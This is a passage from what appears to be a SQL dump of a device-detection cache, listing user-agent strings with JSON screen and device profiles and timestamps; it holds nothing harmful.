Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":872,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1711645635),('Owler (ows.eu/owler)','',1748443129),('Wordup-1','',1717495124),('Roku/DVP-4.1 (024.01E01250A)','',1713535560),('Mozilla/5.0 (Linux; Android 11; 2112123AG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1713727493),('Mozilla/5.0 (Linux; Android 6.*; LG-D850) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1714201078),('Mozilla/4.0 Java/17.0','',1714681227),('Mozilla/5.0 (Linux; Android 13; Xiaomi 11T Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1714793347),('w3m/0.5','',1715080812),('Mozilla/5.0 (Linux; Android 14; SM-A525F) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1715542958),('TMP, Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1724053903),('Mozilla/5.0 (Linux; Android 12; NAM-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1716718208),('Mozilla/4.054101423 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)','',1747948159),('Mozilla/5.0 (Linux; Android 13; 2306EPN60G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717700260),('Mozilla/5.0 (Linux; Android 4.*; SAMSUNG SM-T255a) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":2.25,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717832925),('Mozilla/5.0 (Android; Android 4.*; Ascend G310) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717850980),('Mozilla/5.0 (Linux; Linux i645) Gecko/* Firefox/*','',1717835769),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_4_4; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879637),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_5_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717839794),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-P350) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717840247),('Mozilla/5.0 (iPad; CPU iPad OS 10 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1727537050),('Mozilla/5.0 (Android; Android 6.*; Nexus 5P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717841159),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_3_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717841346),('Mozilla/5.0 (Android; Android 5.*; MOTO G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717841348),('Mozilla/5.0 (Android; Android 7.*; Xperia) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717841530),('Mozilla/5.0 (Android; Android 6.*; Nexus 6P) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717841868),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_9_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717842032),('Mozilla/5.0 (Linux; Android 4.*; MOTOROLA MSM8960) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717842790),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G9350X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717850303),('Mozilla/5.0 (U; Linux x86_64) Gecko/* Firefox/*','',1729804007),('Mozilla/5.0 (Linux; Linux i664) Gecko/* Firefox/*','',1717851103),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG GT-I9600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1717851335),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_0_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717851987),('Mozilla/5.0 (Linux; Linux x86_64) Gecko/* Firefox/*','',1739507597),('Mozilla/5.0 (Linux; Linux i576) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1717852933),('Mozilla/5.0 (U; Linux i655 x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1717853018),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG GT-I9400) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1717853263),('Mozilla/5.0 (iPod; CPU iPod OS 9_0_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717853422),('Mozilla/5.0 (Linux; Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1730252231),('Mozilla/5.0 (U; Linux i660) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1717863628),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_0; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717863735),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_9_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717863948),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_5_5; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717896609),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":375,\"screenHeight\":812,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717897490),('Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":414,\"screenHeight\":896,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717897583),('Mozilla/5.0 (Linux; Android 6.*; HTC OneS dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717897744),('Mozilla/5.0 (Linux; Android 5.*; Nokia 1100 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717897877),('Mozilla/5.0 (Android; Android 6.*; HTC One_M9 dual sim) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717897939),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_4; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"iphone\",\"screenWidth\":428,\"screenHeight\":926,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717897996),('Mozilla/5.0 (Linux; Android 5.*; HTC Butterfly S 901s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717898053),('Mozilla/5.0 (Linux i542) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1717898106),('Mozilla/5.0 (Linux; Android 6.*; SM-D925I) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":891,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717898116),('Mozilla/5.0 (iPad; CPU iPad OS 9 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730142081),('Mozilla/5.0 (Linux; Android 7.*; SAMSUNG GT-I9200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1717898608),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_9_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717898971),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_5_5; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717898913),('Mozilla/5.0 (Android; Android 6.*; SAMSUNG SM-D928S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899012),('Mozilla/5.0 (Android; Android 4.*; SGH-I337M) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899109),('Mozilla/5.0 (Linux; Linux i555 x86_64) Gecko/* Firefox/*','',1718880019),('Mozilla/5.0 (iPod; CPU iPod OS 8_5_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899229),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_4_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899256),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_6_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879865),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_2_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899440),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_7_1; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717899475),('Mozilla/5.0 (Linux; Android 4.*; Nexus5 V7.1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1717899566),('Mozilla/5.0 (iPod; CPU iPod OS 10_1_5; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717908062),('Mozilla/5.0 (Linux; Android 5.*; HTC [M8','',1717911636),('Mozilla/5.0 (iPad; CPU iPad OS 7 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1730141227),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_8_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717993109),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_2_4; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1717993109),('Mozilla/5.0 (Linux; Android 14; 22101316G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1736948033),('Mozilla/5.0 (Linux; Android 12; Redmi 10 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718395905),('Mozilla/5.0 (Linux; Android 11; Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1726766910),('Mozilla/5.0 (Linux; Android 10; MAR-LX1A; HMSCore 6.13; GMSCore 24.22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718523118),('mozilla/5.0 (iphone; cpu iphone xx 13_5_1 like mac xx x) applewebkit/605.1 (khtml, like gecko) mobile/15e148 micromessenger/7.0(0x17000f2b) nettype/4g language/xx miniprogram','',1723257110),('Mozilla/5.0 (Linux; Android 11; Redmi K30 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":851,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1726945302),('Mozilla/5.0 (Linux i674) Gecko/* Firefox/*','',1718868127),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_6_2; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1724184570),('Mozilla/5.0 (iPod; CPU iPod OS 10_0_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879341),('Mozilla/5.0 (Linux; Linux i583 x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1718879377),('Mozilla/5.0 (Linux x86_64) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','{\"type\":\"desktop\",\"markup\":\"\"}',1727540220),('Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879520),('Mozilla/5.0 (Android; Android 7.*; Nexus 6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879556),('Mozilla/5.0 (Linux i550) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','',1718879658),('Mozilla/5.0 (Linux; Android 5.*; SAMSUNG SM-G440) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":4,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}',1718879752),('Mozilla/5.0 (Linux i563 x86_64) Gecko/* Firefox/*','',1718879837),('Mozilla/5.0 (iPhone; CPU iPhone OS 11_0_8; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879885),('Mozilla/5.0 (iPhone; CPU iPhone OS 7_4_6; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718879931),('Mozilla/5.0 (Linux; Android 7.*; Pixel C) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1718879994),('Mozilla/5.0 (iPhone; CPU iPhone OS 9_7_9; like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1718890443),('mozilla/5.0 (ipod; cpu ipod xx 7_6_1; like mac xx x) applewebkit/602.14 (khtml, like gecko) chrome/53.0 mobile safari/600.4','',1719363830),('Mozilla/5.0 (Linux; Android 14; 21081111RG) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":873,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1728157666),('mozilla/5.0 (compatible; msie 7.0; windows xx 6.1; x64; xx trident/4.0)','',1719509905),('mozilla/5.0 (linux; android 7.0; pixel xx build/nme91e) applewebkit/600.20 (khtml, like gecko) chrome/55.0 mobile safari/533.8','',1719552989),('mozilla/5.0 (windows; windows xx 6.0; wow64) gecko/* firefox/71.8','',1719553701),('Mozilla/5.0 (Linux; Android 14; SAMSUNG SM-A136B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1719641897),('BrightSign/8.3 (XT1144) Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/* (KHTML, like Gecko) QtWebEngine/5.12 Chrome Safari/*','',1719704484),('Mozilla/5.0 (Linux; Android 10; LIO-AN00) MicroMessenger Weixin QQ AppleWebKit/* (KHTML, like Gecko) Chrome XWEB/2692 MMWEBSDK/200901 Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":392,\"screenHeight\":800,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748531351),('Mozilla/5.0(iPad; CPU iPhone OS 3 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1720176778),('Mozilla/5.0 (Linux; Android(Lollipop); Samsung SM-G920T Build/LMY47X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','',1720224240),('Mozilla/5.0 (Linux; Android 14; SM-A556B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":914,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748069233),('Mozilla/5.0 (Linux; Android 14; A063) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1720910766),('Mozilla/5.0 (Linux; Android 14) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1741793576),('Mozilla/5.0 (Linux; Android 14; LE2123) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":858,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721148681),('Mozilla/5.0 (compatible; wget/1.20)','{\"type\":\"desktop\",\"markup\":\"\"}',1721247977),('Mozilla/5.0 (Linux; Android 14; SM-A236B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":857,\"pixelRatio\":2.8125,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1748257845),('Mozilla/5.0 (iPad; CPU OS 17 like Mac OS X) AppleWebKit/* (KHTML, like Gecko) Mobile/* Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":768,\"screenHeight\":1024,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1745890276),('Mozilla/4.066686748 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)','',1721433006),('Mozilla/5.0 (Linux; Android 14; Nokia G60 5G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":432,\"screenHeight\":960,\"pixelRatio\":2.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721468574),('Mozilla/5.0 (Linux; Android 14; SM-A336B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":853,\"pixelRatio\":1.875,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1721473218),('HTC_Dream Mozilla/5.0 (Linux; Android 1.*) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','',1721541880),('mozilla/5.0 (windows; windows xx 10.3; win64; x64) applewebkit/602.13 (khtml, like gecko) chrome/50.0 safari/601','',1721722176),('mozilla/5.0 (windows xx 6.3; x64) gecko/* firefox/65.1','',1721778179),('mozilla/5.0 (windows; windows xx 10.4; x64) applewebkit/603.47 (khtml, like gecko) chrome/47.0 safari/602.2 edge/8.12379','',1721779971),('mozilla/5.0 (windows; windows xx 10.0; wow64) gecko/* firefox/57.8','',1721780011),('mozilla/5.0 (android; android 7.1; lg-h920 build/nrd90c) applewebkit/533.31 (khtml, like gecko) chrome/53.0 mobile safari/601.1','',1721781460),('mozilla/5.0 (compatible; msie 8.0; windows; windows xx 6.0; x64 trident/4.0)','',1721781579),('mozilla/5.0 (compatible; msie 8.0; windows; windows xx 6.3; win64; x64; xx trident/4.0)','',1721781710),('mozilla/5.0 (linux; android 5.0; lg-d714 build/lrx22g) applewebkit/536.49 (khtml, like gecko) chrome/52.0 mobile safari/600.8','',1721781847),('mozilla/5.0 (windows; windows xx 10.3; wow64) applewebkit/603.38 (khtml, like gecko) chrome/51.0 safari/535.9 edge/8.80512','',1721781913),('mozilla/5.0 (compatible; msie 9.0; windows; windows xx 6.0; win64; x64 trident/5.0)','',1721781954),('mozilla/5.0 (compatible; msie 7.0; windows xx 10.4; xx trident/4.0)','',1721781997),('mozilla/5.0 (windows xx 10.1) applewebkit/533.19 (khtml, like gecko) chrome/47.0 safari/602','',1721783113),('mozilla/5.0 (iphone; cpu iphone xx 11_6_8; like mac xx x) applewebkit/603.25 (khtml, like gecko) chrome/47.0 mobile safari/536.9','',1721783113),('mozilla/5.0 (compatible; msie 11.0; windows; windows xx 6.0; wow64 trident/7.0)','',1721783284),('mozilla/5.0 (linux; linux i676 x86_64) gecko/* firefox/48.7','',1721783447),('mozilla/5.0 (linux; linux i675 x86_64) gecko/* firefox/64.3','',1721784437),('mozilla/5.0 (windows; windows xx 6.1) applewebkit/537.16 (khtml, like gecko) chrome/48.0 safari/537.2 edge/9.73812','',1721787303),('mozilla/5.0 (compatible; msie 7.0; windows; windows xx 6.2; trident/4.0)','',1721809991),('mozilla/5.0 (windows; windows xx 10.5; x64) applewebkit/602.8 (khtml, like gecko) chrome/50.0 safari/603.4 edge/15.94933','',1721811727),('mozilla/5.0 (linux; linux x86_64) gecko/* firefox/48.6','',1721816581),('mozilla/5.0 (windows xx 10.0; win64; x64) gecko/* firefox/71.9','',1721867558),('mozilla/5.0 (linux; android 5.0; sm-n910f build/lrx22c) applewebkit/533.42 (khtml, like gecko) chrome/50.0 mobile safari/537.6','',1721869293),('mozilla/5.0 (linux; android 5.0; lg-d721 build/lrx22g) applewebkit/535.9 (khtml, like gecko) chrome/53.0 mobile safari/534.3','',1721878588),('mozilla/5.0 (ipod; cpu ipod xx 9_4_3; like mac xx x) applewebkit/602.21 (khtml, like gecko) chrome/51.0 mobile safari/536.2','',1721887125),('mozilla/5.0 (windows; windows xx 6.3) applewebkit/600.36 (khtml, like gecko) chrome/55.0 safari/602','',1721887126),('mozilla/5.0 (ipod; cpu ipod xx 11_3_9; like mac xx x) applewebkit/602.7 (khtml, like gecko) chrome/49.0 mobile safari/534.9','',1721896754),('mozilla/5.0 (linux; linux x86_64) applewebkit/535.29 (khtml, like gecko) chrome/53.0 safari/534','',1722040457),('mozilla/5.0 (windows xx 10.0; wow64) applewebkit/534.17 (khtml, like gecko) chrome/53.0 safari/600.9 edge/15.24347','',1722040457),('Mozilla/5.0 (Linux; Android 2.*; BNTV250) AppleWebKit/* (KHTML, like Gecko) Safari/*','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":854,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}',1722070173),('mozilla/5.0 (iphone; cpu iphone xx 8_9_6; like mac xx x) applewebkit/601.48 (khtml, like gecko) chrome/48.0 mobile safari/602.4','',1722087655),('mozilla/5.0 (iphone; cpu iphone xx 11_7_5; like mac xx x) applewebkit/537.9 (khtml, like gecko) chrome/49.0 mobile safari/535.5','',1722088519),('mozilla/5.0 (compatible; msie 11.0; windows; windows xx 6.1; xx trident/7.0)','',1722097774),('mozilla/5.0 (linux i640 x86_64) gecko/* firefox/74.2','',1722097774),('mozilla/5.0 (compatible; msie 9.0; windows xx 6.1; x64 trident/5.0)','',1722107500),('mozilla/5.0 (linux i586 x86_64) gecko/* firefox/72.6','',1722107875),('mozilla/5.0 (windows xx 10.5; win64; x64) applewebkit/600.42 (khtml, like gecko) chrome/49.0 safari/537.7 edge/15.87863','',1722148095),('mozilla/5.0 (iphone; cpu iphone xx 10_7_6; like mac xx x) applewebkit/534.27 (khtml, like gecko) chrome/52.0 mobile safari/535.2','',1722167767),('mozilla/5.0 (iphone; cpu iphone xx 7_3_6; like mac xx x) applewebkit/534.38 (khtml, like gecko) chrome/49.0 mobile safari/533.3','',1722168010),('mozilla/5.0 (iphone; cpu iphone xx 7_6_6; like mac xx x) applewebkit/600.12 (khtml, like gecko) chrome/54.0 mobile safari/601.8','',1722177814),('Syndirella/0.91pre','',1722199025),('mozilla/5.0 (linux; android 7.0; nexus 8 build/npd90g) applewebkit/537.12 (khtml, like gecko) chrome/49.0 mobile safari/601.2','',1722217345),('mozilla/5.0 (compatible; msie 11.0; windows; windows xx 6.2; win64; x64 trident/7.0)','',1722249205),('mozilla/5.0 (ipad; cpu ipad xx 7_0_0 like mac xx x) applewebkit/600.13 (khtml, like gecko) chrome/55.0 mobile safari/533.0','',1722258249),('mozilla/5.0 (iphone; cpu iphone xx 11_9_9; like mac xx x) applewebkit/603.2 (khtml, like gecko) chrome/53.0 mobile safari/533.8','',1722309009),('mozilla/5.0 (linux; linux x86_64) gecko/* firefox/60.6','',1722319104),('Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0) EudoraWeb 2','',1722386594),('mozilla/5.0 